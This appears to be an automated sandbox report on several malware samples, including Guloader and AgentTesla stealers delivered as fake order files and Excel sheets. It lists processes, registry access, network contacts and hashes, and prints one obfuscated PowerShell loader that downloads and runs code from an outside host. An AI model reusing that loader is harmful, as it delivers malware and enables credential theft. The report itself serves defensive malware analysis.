Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe

"C:\Users\Admin\AppData\Local\Temp\New order 003848848575 02162022.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|IEX;do {$ping = test-connection -comp google.com -count 1 -Quiet} until($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|I`E`X;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing', [Microsoft.VisualBasic.CallType]::Method,'http' + '://spa2o.com/H99.jpg')|I`E`X

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 spa2o.com udp
HR 185.58.73.32:80 spa2o.com tcp

Files

memory/2436-0-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp

memory/2436-1-0x0000000001220000-0x0000000001228000-memory.dmp

memory/2704-6-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

memory/2704-8-0x000000001B810000-0x000000001BAF2000-memory.dmp

memory/2704-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-9-0x0000000001E10000-0x0000000001E18000-memory.dmp

memory/2704-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-11-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-12-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-13-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-14-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

memory/2704-15-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

memory/2704-16-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

118s

Max time network

126s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls

Network

N/A

Files

memory/2648-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2648-1-0x000000007278D000-0x0000000072798000-memory.dmp

memory/2648-2-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-13-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-15-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-14-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-12-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-11-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-10-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-9-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-7-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-6-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-5-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-4-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-3-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-8-0x0000000000530000-0x0000000000630000-memory.dmp

memory/2648-16-0x000000007278D000-0x0000000072798000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls

Network

N/A

Files

memory/2716-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2716-1-0x00000000727CD000-0x00000000727D8000-memory.dmp

memory/2716-16-0x00000000727CD000-0x00000000727D8000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240729-en

Max time kernel

16s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Signatures

Guloader family

guloader

Guloader,Cloudeye

downloader guloader

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe

"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\nsuF539.tmp\Math.dll

MD5 85428cf1f140e5023f4c9d179b704702
SHA1 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba
SHA256 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a
SHA512 dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59

\Users\Admin\AppData\Local\Temp\nsuF539.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

memory/1824-17-0x00000000042A0000-0x00000000043A0000-memory.dmp

memory/1824-18-0x00000000042A0000-0x00000000043A0000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

144s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe

"C:\Users\Admin\AppData\Local\Temp\PO_#YBIC3892900183902328_Evaluated Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 sync-shop.com udp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp
US 74.220.219.225:443 sync-shop.com tcp

Files

memory/1940-0-0x00000000001B0000-0x00000000001B1000-memory.dmp

memory/1940-2-0x0000000000406000-0x0000000000407000-memory.dmp

memory/1940-3-0x0000000000400000-0x00000000004AD000-memory.dmp

memory/1940-4-0x00000000001B0000-0x00000000001B1000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

148s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 25.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp

Files

memory/1740-1-0x00007FFD2908D000-0x00007FFD2908E000-memory.dmp

memory/1740-0-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp

memory/1740-3-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp

memory/1740-2-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp

memory/1740-4-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-5-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-6-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp

memory/1740-7-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-8-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-10-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-12-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-13-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-14-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-16-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-17-0x00007FFCE6E20000-0x00007FFCE6E30000-memory.dmp

memory/1740-15-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-18-0x00007FFCE6E20000-0x00007FFCE6E30000-memory.dmp

memory/1740-11-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-9-0x00007FFCE9070000-0x00007FFCE9080000-memory.dmp

memory/1740-46-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

memory/1740-47-0x00007FFD2908D000-0x00007FFD2908E000-memory.dmp

memory/1740-48-0x00007FFD28FF0000-0x00007FFD291E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 d6a8751247b907a05fe4c5e591a7329e
SHA1 e04fa6f11939152ac76fc1f5e593ce5dae258319
SHA256 1b3914a8e1640456acd4463618ecec0fa7ae9ddeae317220fa766be5f2974082
SHA512 9ba04fa5148d0bcde255d723a2b9c0533b0c2bd996fe8d5221dfed146f90fac0e895395689530a935f31878b0f70b825cd0fab1ce0211aaeeaaae23844ecf51c

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

127s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4992 set thread context of 4440 N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\EZ0496.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

C:\Users\Admin\AppData\Local\Temp\EZ0496.exe

"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 17.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 25.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4992-0-0x000000007440E000-0x000000007440F000-memory.dmp

memory/4992-1-0x00000000008C0000-0x000000000098A000-memory.dmp

memory/4992-2-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4992-3-0x00000000052C0000-0x00000000052CE000-memory.dmp

memory/4992-4-0x0000000005590000-0x0000000005622000-memory.dmp

memory/4992-5-0x000000007440E000-0x000000007440F000-memory.dmp

memory/4992-6-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4992-7-0x0000000005830000-0x00000000058CC000-memory.dmp

memory/4992-8-0x0000000005CC0000-0x0000000005D7C000-memory.dmp

memory/4992-9-0x0000000005A10000-0x0000000005A4C000-memory.dmp

memory/4440-10-0x0000000000400000-0x000000000043C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EZ0496.exe.log

MD5 e50d61d6d5cec0d2c6b3fbf02b17af2d
SHA1 fcf43f96e7389c27ee201fb00b65db01ca2cee40
SHA256 a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9
SHA512 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924

memory/4992-13-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4440-14-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4440-15-0x00000000052D0000-0x0000000005874000-memory.dmp

memory/4440-16-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4440-17-0x0000000005030000-0x0000000005048000-memory.dmp

memory/4440-18-0x0000000005CC0000-0x0000000005D26000-memory.dmp

memory/4440-19-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4440-20-0x0000000074400000-0x0000000074BB0000-memory.dmp

memory/4440-21-0x0000000005EB0000-0x0000000005F00000-memory.dmp

memory/4440-22-0x0000000006060000-0x000000000606A000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20241010-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\680589798891.xls

Network

N/A

Files

memory/1500-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1500-1-0x0000000072A8D000-0x0000000072A98000-memory.dmp

memory/1500-2-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-3-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-4-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-17-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-16-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-15-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-14-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-13-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-12-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-11-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-10-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-9-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-8-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-7-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-6-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-5-0x0000000000300000-0x0000000000400000-memory.dmp

memory/1500-18-0x0000000072A8D000-0x0000000072A98000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240903-en

Max time kernel

117s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 220

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I795405_33242211.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 217.194.19.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4328-0-0x00007FFB25A2D000-0x00007FFB25A2E000-memory.dmp

memory/4328-3-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

memory/4328-4-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

memory/4328-6-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-5-0x00007FFAE5A10000-0x00007FFAE5A20000-memory.dmp

memory/4328-10-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

memory/4328-11-0x00007FFB25990000-0x00007FFB25B85000-memory.dmp

